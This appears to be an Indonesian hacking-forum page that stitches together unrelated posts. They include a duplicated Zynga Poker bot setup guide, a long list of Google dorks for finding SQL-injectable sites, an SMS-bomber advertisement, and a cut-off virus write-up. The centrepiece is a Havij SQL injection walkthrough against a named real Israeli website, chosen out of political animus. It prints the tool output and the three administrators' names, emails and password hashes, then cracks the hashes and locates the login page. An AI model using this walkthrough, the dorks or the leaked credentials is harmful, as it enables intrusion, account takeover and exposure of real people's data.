-
-
--
by budiaji»
-
-
--
by budiaji»
Poker BOT 2011 Works 100% [Win Rate 95% + Automatic CHAT]
by dierace » Fri Nov 12, 2010 10:10 pm Ini adalah versi terbaru dari Zynga Poker Bot yang bekerja dengan baik, Zynga ini telah diperbarui Poker Bot kemampuan untuk membaca Zynga Poker "buta", sehingga Anda tidak perlu melakukannya secara manual. Zynga Poker Bot 2011 adalah 100% AFK Bot, di Zynga Poker Bot 2011 telah ditambahkan kemampuan untuk membuat keputusan "Panggilan", “Rise”, "Panggilan Setiap" dan "Lipat" sesuai dengan kondisi di meja kartu, Anda bahkan dapat mengatur kartu apa pun yang Anda i"Rise";All in", “Rise”, "Panggilan Setiap" atau "Lipat", membuat Zynga Poker Bot 2011 bisa bermain dengan gaya Anda sendiri.
[spoiler=penjelasan]
Sebelum Mengklik. Exe ...
Settings.ini
Setelah bot diekstrak ke lokasi pilihan Anda, Membuka [nama bot]/ settings.ini. Ubah preferensi Anda settings.ini. Di sini, Saya akan membahas pengaturan yang relatif terhadap Anda:
'; pemain minimum di meja termasuk Anda sendiri sebelum bot akan meninggalkan
table_min_players = 5 '
Ini adalah jumlah minimum pemain di meja (termasuk diri) yang perlu hadir dalam bot untuk tinggal di meja. Jika jumlah pemain di meja Anda berada di jatuh di bawah nomor yang telah ditentukan, bot akan meninggalkan dan pergi ke meja lain. Biasanya, anggota menetapkan jumlah minimum pemain 5.
'; minimum ruangan besar buta bot Anda akan tinggal di
table_min_blind = 1000 '
Ini adalah tabel terkecil bahwa bot akan bermain di. Biasanya, apa di atas 4 boleh saja. Recently, Zynga telah mulai mengirimkan pemain yang lebih tinggi untuk 50 buta tabel, jadi jika Anda ingin bermain di atas meja di atas 25/50 hanya, menetapkan nomor ini untuk 200.
'; maksimum ruang besar buta bot Anda akan tinggal di
table_max_blind = 2000000 '
Ini adalah tabel tertinggi bahwa bot akan bermain di. Jika Anda bosan dengan bot mencapai tabel yang Anda anggap terlalu tinggi tirai, menetapkan jumlah maksimum yang buta bahwa Anda akan memungkinkan bot untuk memasukkan. misalnya, jika Anda mengatur buta maksimum untuk 10000, bot akan hanya bermain meja di mana buta sama dengan atau lebih rendah dari 10000.
'; jumlah besar blinds bot Anda akan duduk bersama
table_buyin = 20 '
Ini adalah berapa banyak bot akan membeli ke dalam tabel dengan. Nomor yang sudah Anda tentukan adalah dikalikan dengan besar buta meja yang Anda duduk di. misalnya, a table buyin of 20 pada 25/50 meja akan berarti bahwa Anda membeli dengan 1000 chips. ASebuah meja buyin dari20 di meja 5k/10k akan berarti bahwa Anda membeli dengan 200,000 chichip0 adalah jumlah tirai besar yang umumnya digunakan oleh sebagian besar anggota.
'; harus log bot teks
log_text = 1 '
Hal ini harus selalu diatur ke 1, untuk digunakan ketika Anda memerlukan bantuan di situs ini.
'; seharusnya bot meminta buta jika tidak diketahui
log_screen_blind = 1 '
Ini adalah jika bot harus minta buta yang tidak diketahui. Set 1 ketika Anda memantau bot, 0 bila Anda tidak (jika Anda tidur / di tempat kerja). Ini adalah langkah yang cerdas untuk merekam sebagian besar tirai Anda berpikir bahwa bot akan berinteraksi sebelum anda meninggalkan situs ini tanpa perawatan.
'[Browser]
;browser_title = Mozilla Firefox
;browser_file = firefox.exe
; browser lain
;browser_title = Internet Explorer
;browser_file = iexplore.exe
;browser_title = Google Chrome
;browser_file = chrome.exe
;Poker Bot browser_title = Konsol
;browser_file = konsol
;browser_title = Opera
;browser_file Opera.exe = '
Ini adalah tempat Anda memilih browser anda akan menjalankan bot di. Hapus [;] yaitu sebelum browser Anda memilih judul dan file. Pada beberapa bot rilis, [;] akan perlu ditambahkan sebelum browser yang Anda tidak ingin menggunakan.
Sebelum Mengklik. Exe
Config.ini
Bagian ini perubahan terus, jadi sambil menulis ini aku akan menganggap bahwa kita semua punya akal sehat.
'[Preflop_Hands]
all_in = AA
meningkatkan = KK QQ AK
panggilan = AQ KQ TT JJ AJ QJ KJ '
Ini adalah tangan yang bertindak bot dengan pra-flop. Anda dapat mengedit ini sendiri untuk mencerminkan gaya Anda bermain. 'A' berarti Ace, 'K' berarti Raja, 'Q' berarti Ratu, 'J' berarti Jack dan 'T' berarti 10. Kartu lain diwakili oleh angka-angka di sana, misalnya '9 'akan 9. Tangan yang tidak ditentukan di sebelah all_in, menaikkan dan panggilan, bot akan flip.
Jika Anda menggunakan versi bot dengan pilihan cocok, itu umumnya harus sama dengan ini.
'[FlopScore]
0-0.59 = panggilan
0.6-0.69 = panggilan
0.7-0.79 = meningkatkan
0.8-0.89 = meningkatkan
0.9-1 = all_in '
Ini adalah pasca-flop tindakan skor. Ketika memainkan bot, itu menghitung kesempatan Anda untuk menang, diberikan menggeletak. Itu berubah setelah giliran ditampilkan, dan lagi mengikuti sungai. 'panggilan' berarti bahwa bot akan memanggil apa dengan skor yang ditentukan, 'meningkatkan' berarti bahwa bot akan menaikkan dengan skor yang ditentukan, dan 'all_in' berarti bahwa bot akan pergi semua dengan skor yang ditentukan.
'[memanggil]
;Ini adalah jumlah x besar buta yang ingin
;mengunjungi, sehingga mengubahnya sesuai
callamount = 4 '
Ini adalah berapa banyak bot akan panggilan pra-flop. Nomor yang sudah Anda tentukan adalah dikalikan dengan buta, jadi jika Anda berada di sebuah meja 10k dengan jumlah panggilan 4, bot akan panggilan hingga 40,000 chip.
'[menaikkan]
;Ini adalah jumlah x besar buta yang ingin
;meningkatkan, sehingga mengubahnya sesuai
raiseamount = 10 '
Ini adalah berapa banyak bot Anda akan meningkatkan, jika Anda telah menetapkan bahwa ia harus melakukannya. Lagi, jumlah ini dikalikan dengan buta meja Anda berada di.
Recording Kursi ...
Hapus semua yang ada di [nama bot]/ data / kursi (jika ada sesuatu yang di sana)
Sekarang saatnya untuk membuka facebook dan sign in ke account Anda. Pergi ke application: poker texas hold'em zynga.
Join kosong 9 meja kursi. Klik bot.exe dan bot akan secara otomatis merekam kursi.
Catatan: Kalau ada yang bergabung dengan meja sementara catatan bot kursi, Anda harus memulai proses rekaman lagi.
Sekarang kau baik untuk pergi menyeringai Tapi beberapa pengingat pertama ...
Hal yang Diharapkan Dari bot ...
Bot akan mengambil alih mouse anda ketika sedang bermain. Juga akan mengalami masalah khusus untuk versi yang anda gunakan.
Bukan hal-hal yang Diharapkan Dari bot ...
Bot tidak dapat dijalankan di latar belakang, Oleh karena itu jendela yang diputar bot tidak dapat diminimalisir atau ditempatkan di latar belakang. Juga, bot tidak dijamin membuat Anda keuntungan apa pun: meskipun permainan keterampilan, poker juga permainan keberuntungan.
Panduan ditulis menggunakan Botv010. Beberapa aspek dari bot terikat untuk mengubah, tapi begitu Anda telah melakukan langkah-langkah, Anda harus tahu cukup untuk menyesuaikan diri mereka.
Selamat, Anda sekarang memiliki bot anda sendiri!
[/spoiler]Settings.ini
Setelah bot diekstrak ke lokasi pilihan Anda, Membuka [nama bot]/ settings.ini. Ubah preferensi Anda settings.ini. Di sini, Saya akan membahas pengaturan yang relatif terhadap Anda:
'; pemain minimum di meja termasuk Anda sendiri sebelum bot akan meninggalkan
table_min_players = 5 '
Ini adalah jumlah minimum pemain di meja (termasuk diri) yang perlu hadir dalam bot untuk tinggal di meja. Jika jumlah pemain di meja Anda berada di jatuh di bawah nomor yang telah ditentukan, bot akan meninggalkan dan pergi ke meja lain. Biasanya, anggota menetapkan jumlah minimum pemain 5.
'; minimum ruangan besar buta bot Anda akan tinggal di
table_min_blind = 1000 '
Ini adalah tabel terkecil bahwa bot akan bermain di. Biasanya, apa di atas 4 boleh saja. Recently, Zynga telah mulai mengirimkan pemain yang lebih tinggi untuk 50 buta tabel, jadi jika Anda ingin bermain di atas meja di atas 25/50 hanya, menetapkan nomor ini untuk 200.
'; maksimum ruang besar buta bot Anda akan tinggal di
table_max_blind = 2000000 '
Ini adalah tabel tertinggi bahwa bot akan bermain di. Jika Anda bosan dengan bot mencapai tabel yang Anda anggap terlalu tinggi tirai, menetapkan jumlah maksimum yang buta bahwa Anda akan memungkinkan bot untuk memasukkan. misalnya, jika Anda mengatur buta maksimum untuk 10000, bot akan hanya bermain meja di mana buta sama dengan atau lebih rendah dari 10000.
'; jumlah besar blinds bot Anda akan duduk bersama
table_buyin = 20 '
Ini adalah berapa banyak bot akan membeli ke dalam tabel dengan. Nomor yang sudah Anda tentukan adalah dikalikan dengan besar buta meja yang Anda duduk di. misalnya, a table buyin of 20 pada 25/50 meja akan berarti bahwa Anda membeli dengan 1000 chips. ASebuah meja buyin dari20 di meja 5k/10k akan berarti bahwa Anda membeli dengan 200,000 chichip0 adalah jumlah tirai besar yang umumnya digunakan oleh sebagian besar anggota.
'; harus log bot teks
log_text = 1 '
Hal ini harus selalu diatur ke 1, untuk digunakan ketika Anda memerlukan bantuan di situs ini.
'; seharusnya bot meminta buta jika tidak diketahui
log_screen_blind = 1 '
Ini adalah jika bot harus minta buta yang tidak diketahui. Set 1 ketika Anda memantau bot, 0 bila Anda tidak (jika Anda tidur / di tempat kerja). Ini adalah langkah yang cerdas untuk merekam sebagian besar tirai Anda berpikir bahwa bot akan berinteraksi sebelum anda meninggalkan situs ini tanpa perawatan.
'[Browser]
;browser_title = Mozilla Firefox
;browser_file = firefox.exe
; browser lain
;browser_title = Internet Explorer
;browser_file = iexplore.exe
;browser_title = Google Chrome
;browser_file = chrome.exe
;Poker Bot browser_title = Konsol
;browser_file = konsol
;browser_title = Opera
;browser_file Opera.exe = '
Ini adalah tempat Anda memilih browser anda akan menjalankan bot di. Hapus [;] yaitu sebelum browser Anda memilih judul dan file. Pada beberapa bot rilis, [;] akan perlu ditambahkan sebelum browser yang Anda tidak ingin menggunakan.
Sebelum Mengklik. Exe
Config.ini
Bagian ini perubahan terus, jadi sambil menulis ini aku akan menganggap bahwa kita semua punya akal sehat.
'[Preflop_Hands]
all_in = AA
meningkatkan = KK QQ AK
panggilan = AQ KQ TT JJ AJ QJ KJ '
Ini adalah tangan yang bertindak bot dengan pra-flop. Anda dapat mengedit ini sendiri untuk mencerminkan gaya Anda bermain. 'A' berarti Ace, 'K' berarti Raja, 'Q' berarti Ratu, 'J' berarti Jack dan 'T' berarti 10. Kartu lain diwakili oleh angka-angka di sana, misalnya '9 'akan 9. Tangan yang tidak ditentukan di sebelah all_in, menaikkan dan panggilan, bot akan flip.
Jika Anda menggunakan versi bot dengan pilihan cocok, itu umumnya harus sama dengan ini.
'[FlopScore]
0-0.59 = panggilan
0.6-0.69 = panggilan
0.7-0.79 = meningkatkan
0.8-0.89 = meningkatkan
0.9-1 = all_in '
Ini adalah pasca-flop tindakan skor. Ketika memainkan bot, itu menghitung kesempatan Anda untuk menang, diberikan menggeletak. Itu berubah setelah giliran ditampilkan, dan lagi mengikuti sungai. 'panggilan' berarti bahwa bot akan memanggil apa dengan skor yang ditentukan, 'meningkatkan' berarti bahwa bot akan menaikkan dengan skor yang ditentukan, dan 'all_in' berarti bahwa bot akan pergi semua dengan skor yang ditentukan.
'[memanggil]
;Ini adalah jumlah x besar buta yang ingin
;mengunjungi, sehingga mengubahnya sesuai
callamount = 4 '
Ini adalah berapa banyak bot akan panggilan pra-flop. Nomor yang sudah Anda tentukan adalah dikalikan dengan buta, jadi jika Anda berada di sebuah meja 10k dengan jumlah panggilan 4, bot akan panggilan hingga 40,000 chip.
'[menaikkan]
;Ini adalah jumlah x besar buta yang ingin
;meningkatkan, sehingga mengubahnya sesuai
raiseamount = 10 '
Ini adalah berapa banyak bot Anda akan meningkatkan, jika Anda telah menetapkan bahwa ia harus melakukannya. Lagi, jumlah ini dikalikan dengan buta meja Anda berada di.
Recording Kursi ...
Hapus semua yang ada di [nama bot]/ data / kursi (jika ada sesuatu yang di sana)
Sekarang saatnya untuk membuka facebook dan sign in ke account Anda. Pergi ke application: poker texas hold'em zynga.
Join kosong 9 meja kursi. Klik bot.exe dan bot akan secara otomatis merekam kursi.
Catatan: Kalau ada yang bergabung dengan meja sementara catatan bot kursi, Anda harus memulai proses rekaman lagi.
Sekarang kau baik untuk pergi menyeringai Tapi beberapa pengingat pertama ...
Hal yang Diharapkan Dari bot ...
Bot akan mengambil alih mouse anda ketika sedang bermain. Juga akan mengalami masalah khusus untuk versi yang anda gunakan.
Bukan hal-hal yang Diharapkan Dari bot ...
Bot tidak dapat dijalankan di latar belakang, Oleh karena itu jendela yang diputar bot tidak dapat diminimalisir atau ditempatkan di latar belakang. Juga, bot tidak dijamin membuat Anda keuntungan apa pun: meskipun permainan keterampilan, poker juga permainan keberuntungan.
Panduan ditulis menggunakan Botv010. Beberapa aspek dari bot terikat untuk mengubah, tapi begitu Anda telah melakukan langkah-langkah, Anda harus tahu cukup untuk menyesuaikan diri mereka.
Selamat, Anda sekarang memiliki bot anda sendiri!
-
-
--
by budiaji»
Dengan berhasil a Bi4kkob4r masuk ke dalam admin facebook dia mendapat hadiah $.2000
-
-
--
by budiaji»
 XCode ezine issue #1 (April 2006) Download XCode Magazine No 1 | |
 XCode ezine issue #2 (Juni 2006) Download XCode Magazine No 2 | |
 XCode ezine issue #3 (Agustus 2006) Download XCode Magazine No 3 | |
 XCode ezine issue #4 (Oktober 2006) Download XCode Magazine No 4 | |
 XCode ezine issue #5 (Januari 2007) Download XCode Magazine No 5 | |
 XCode ezine issue #6 (April 2007) Download XCode Magazine No 6 | |
 XCode ezine issue #7 ( Juli 2007)Download XCode Magazine No 7 | |
 XCode ezine issue #8 (November 2007) Download XCode Magazine No 8 | |
 XCode ezine issue #9 (Mei 2008) Download XCode Magazine No 9 | |
 XCode ezine issue #10 (Agustus 2008) Download XCode Magazine No 10 | |
 XCode ezine issue #11 (November 2008) Download XCode Magazine No 11 | |
 XCode ezine issue #12 (Februari 2009) Download XCode Magazine No 12 | |
 | |
 | |
 |
-
-
--
by budiaji»
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:Pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:Productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:review.php?id=
inurl:loadpsb.php?id=
inurl:ages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:offer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:Pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:Productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:review.php?id=
inurl:loadpsb.php?id=
inurl:ages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:offer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
-
-
--
by budiaji»
[Tutorial] SQL Injection menggunakan Havij Vers 1.10 By Poni Xcode
Download Hvij
Havij Vers 1.10 , sebuah tool yang powerfull untuk mendapatkan akses admin dengan teknik sql injection. untuk informasi dan download tool ini bisa anda temukan di thread dibawah ini (Hey r3dm0v3.. u coded an awesome tool)- Code: Select all
http://forum.xcode.or.id/viewtopic.php?f=100&t=39403
Ok saya asumsikan anda sudah download dan install di mesin anda. sekarang mari kita coba salah satu website milik Israel.. (hmmm.... kenapa salah satu website di negara anda dijadikan kelinci disini sangat berkaitan erat dengan agresi militer anda pada kapal relawan dunia untuk Palestina.. saya non muslim tapi arogansi Israel adalah buntut dari tutorial ini).
web target : http://www.xenia.co.il/index.php?page_id=93
seperti biasanya berikan tanda ' pada web tsb:
- Code: Select all
http://www.xenia.co.il/index.php?page_id='93
hasilnya dapat anda lihat pada gambar dibawah. BUG SQL Injection
Sekarang jalankan tool Havij lalu masukkan link tersebut lalu klik Analize dan tunggu beberapa saat (yang ini ga sampe 1 menit)....
hasilnya:
Havij 1.10 ready!
Analyzing http://www.xenia.co.il/index.php?page_id='93
Host IP: 212.150.130.231
Web Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.12
Powered-by: PHP/5.2.12
Keyword Found: mysql_num_rows():
I guess injection type is Integer?!
DB Server: MySQL
Selected Column Count is 2
Valid String Column is 1
Target Vulnerable :D
Current DB: xeniaco_xenia
w007s...... I Got the database... sekarang klik Tables lalu klik Get Tables
w007s..... I gOt the Tables from xeniaco_xenia database..
users_match
users_fav
params_parents
params_pages
params_icons
params
page_managers
page_banned
page_allowed
nuke_users
newsletter1
main_access
lpn_users_areas_maps
lpn_users_areas
ip_blocker
gallery_auth_users
form_datas
enter_rules
cat_tbl
bep_users_target
bep_users_cats
bep_pics
bep_other
bep_news
bep_links
bep_html_data
bep_files
bep_data
bep_banners
bep_addons
banners
admins
admin_titles
WhoIsOnLineTbl
WhoIsOnLineMessagesTbl
Table1
Nah .. pada tahap ini, anda perlu cari tahu... dimana letak table yang berisi informasi admin login. setelah ditelusuri ternyata terdapat pada tabel nuke_users. sekarang coba kita lihat isi kolom daripada tabel nuke_users.
Beri tanda centang pada nuke_users lalu klik Get Columns dan tunggu beberapa saat (hmmm... 10 detik aja).
w007ss.... cool.. got to check it out... saya dapatkan kolom sbb
regdate
status
regkey
user_msg_to_mail
mail_check_interval
mail_pass
mail_login
mail_port
mail_server
user_level
user_rank
user_attachsig
user_posts
user_char
newsletter
counter
commentmax
theme
ublock
ublockon
bio
noscore
thold
uorder
umode
storynum
apass
pass
user_cell
user_homephone
user_theme
user_viewemail
user_sig
user_homepage
user_from
user_sign
user_dob
user_regdate
user_avatar
l_name
femail
uname
name uid
newsletter1
nah.. ini adalah kolom dari tabel nuke_users yang berisi informasi registrasi, nama, password, email, nomor hp dari Admin website http://www.xenia.co.il.. sekarang saya akan mencoba mendapatkan akses selanjutnya ke website ini.. hmmmm.... saya ceklis aja kolom :
name
pass
(kolom lain ga penting.. cuma pengen dapat username dan passwordnya aja).
lalu klik Get Data dan
Hasilnya sebagai berikut :
Count(*) of xeniaco_xenia.nuke_users is 3
Data Found: name=à åãé
Data Found: email=udi@tmuna.co.il
Data Found: pass=b440097c79ba6183170f5f118b47a31d
Data Found: name=guy
Data Found: email=guy@xenia.co.il
Data Found: pass=f4384abb3921b5cf321a5a24960c4aef
Data Found: name=inbar
Data Found: email=inbar@xenia.co.il
Data Found: pass=b3f61131b6eceeb2b14835fa648a48ff
w007s.... ternyata website ini memiliki 3 administrator...
hmmmm... passwordnya di HASH alias di-enkripsi..... no problem... havij juga punya md5 hash crack..
Klik MD5 masukkan data salah satu data HASH lalu klik start (tunggu beberapa saat.... 30 detik deh). lalu hasilnya
w0000000000000000000000000000007ZZZZZZZZZZZZZZZZ... password berhasil di-crack.. sekarang tinggal cari halaman login.
Klik Find Admin lalu isi Path to search dengan http://www.xenia.co.il/ lalu klik start.... .... ............. Searching
Got that....
Page Found: http://www.xenia.co.il/login.php
Sekarang anda hanya tinggal ke halaman login, masukkan nama user password dan....
U gained an Access
-
-
--
by budiaji»
Sms Bomberman
Mau ngirim sms langsung bisa 99999999xxxx secara langsung ga usah pusing” pakai aja Software ini software ini bisa mendeteksi semua jenis hp/beberapa Modem gsm jadi tinggal siapin aja operator yang ngasih sms gratis banyak.Tpi ingat demi Ke amanan Software ini tidak saya sebarkan secara bebas jika berminat hub admin:
budiaji.287@gmal.com
warriorshack@hackermail.com no:083870624511
-
-
--
by budiaji»
Amburadul.. begitulah kata yang terucap ketika seseorang terinfeksi virus yang berakibat fatal sampai user tak bisa makan, minum mapun tidur, gara2 semua data amburadul alias hilang entah bagaimana ceritanya, tiba-tiba "ntldr missing" ketika di PC dinyalakan. Virus ini tergolong virus akhir tahun yang berakibat fatal, yang sebelumnya versi 1.0 dari virus ini cukup menghebohkan dengan kritik 'bahasa inggris si pembuat virus ancur lebur', dalam versi 2.0 ini si pembuat mengunakan bahasa indonesia, mungkin belum sempat untuk kursus inggris.
Virus masih dalam keluarga VB & Delphi yang di pack mengunakan UPX / PE Lite dengan mengadopsi file .pif/.cmd/.bat sebagai tringger route dengan mengunakan MacroX dan mengunakan celah keamanan VNC (remote control) port 590X. Virus lokal amburadul mengunakan celah keamanan dari share folder dan network device dengan mengunakan metode ipc$, admin$, serta brute force untuk menjalankan aksinya, tiba-tiba data/settingan kembali ke semula (default), demikian file/folder yang tersharing, lenyap berserta dengan file2nya, sekaligus box linuxpun ikut dikerjai dengan beberapa exploit yang ada didalam tubuh virus.
Sampai akhir desember 2010 ini, Vaksincom mendapakan laporan lebih dari 210 pelapor dalam 1 bulan terakhir ketika virus diperkirakan menyebar lewat YM, E-mail serta situs2 jejaring social seperti facebook, twiiter dan linkedin, yang menutup tahun 2010 dengan "Virus of The Year". Diperkirakan pembuat berasal dari Semarang, Indonesia seorang mahasiswa yang juga tergabung dalam group hacker turki "iSKORPiTX" dengan nick "The Conflickzer", diketahui dari file trojan/backdoor dari badan file yang merupakan file pendukung untuk hacking dan beberapa exploit untuk mengexploitasi sistim operasi khususnya bagi penguna Linux.
Selain itu virus memiliki teknologi Multipolymorhpic yang merupakan file induk berupa karakter teracak dengan badan virus yang teracak juga, hal ini membuat sulit vendor antivirus untuk membuat antivirus yang tepat untuk virus ini. Selain itu virus mengunakan Macro Recording, dimana pada saat2 tertentu, mouse seakan2 berjalan sendiri dengan ketikan keyboard untuk menghapus seluruh file sistim/data pada komputer user. Ikuti perjalanan team Vaksincom membongkar virus Amburadul versi 2.0 ini.
1. Nama Virus : W32.Amburadul-2 alias Ambrol-II/PoisonIvy/DeadLock/MatroX/Brontx.EQ/D.ALL
2. Asal Pembuat : Semarang - Indonesia
3. Dibuat dengan : Batch File adopt dari file .pif, .cmd, bat mengunakan MacroX & AutoIt dengan kompresi UPX / PE Lite dan Backdoor / Trojan dibuat mengunakan bahasa pemograman VB & Delphi.
4. Efek : Vaksincom mencatat ada 10 efek nyata yang dilakukan oleh Virus Amburadul sesuai dengan tringger routine virus, seperti :
5. Media Sebar : Flashdisk, e-mail (attachment/.lnk) dan Yahoo messenger.
- Menghapus seluruh file offline pada drive Z s/d C secara berurutan, dengan memberi label volume "AMBURADUL" mengunakan batchfile/macrox (port 5900/vnc)
- Mengformat data drive Z s/d C (kecuali sistim) dengan menganti label selain drive C dengan "AMBURADUL" dengan metode yang sama (no. 1).
- Injeksi ke Internet Explorer dengan menambahkan System Down – hacked by iSKORPiTX (hacker turki yang memiliki backdoor / trojan celah keamanan pada rpc-windows.
- Mematikan fungsi antivirus dengan cara melakukan uninstall dan mematikan proses penjagaan (guarding) antivirus/firewall.
- Mengirimkan informasi typing horse ke iskorpitx@yahoo.com dan conflickzer@yahoo.com berupa update status virus dan info pc terinfeksi berupa key trapped.
- File induk terletak pada badan file sistim windows (svchost.exe, csrss.exe, alg.exe) yang digunakan oleh virus conficker dengan menyebabkan rpc hole berakibat jaringan down/looping.
- Mengunakan Macro Recording untuk menjalan aksi lewat remote VNC (port 5900), yang merupakan bug dari vnc versi 4 dengan membypass password default.
- Menginject jaringan dengan metode IPC$ pada bug sharing pada Windows dengan melakukan direktori network listing untuk menjalankan aksi menghapusan file/data.
- Mencoba untuk masuk ke sistim keamanan jaringan Windows / Linux dengan mencoba beberapa username dan password dengan metode bruteforcing. Dengan informasi user/password yang dicoba sbb :
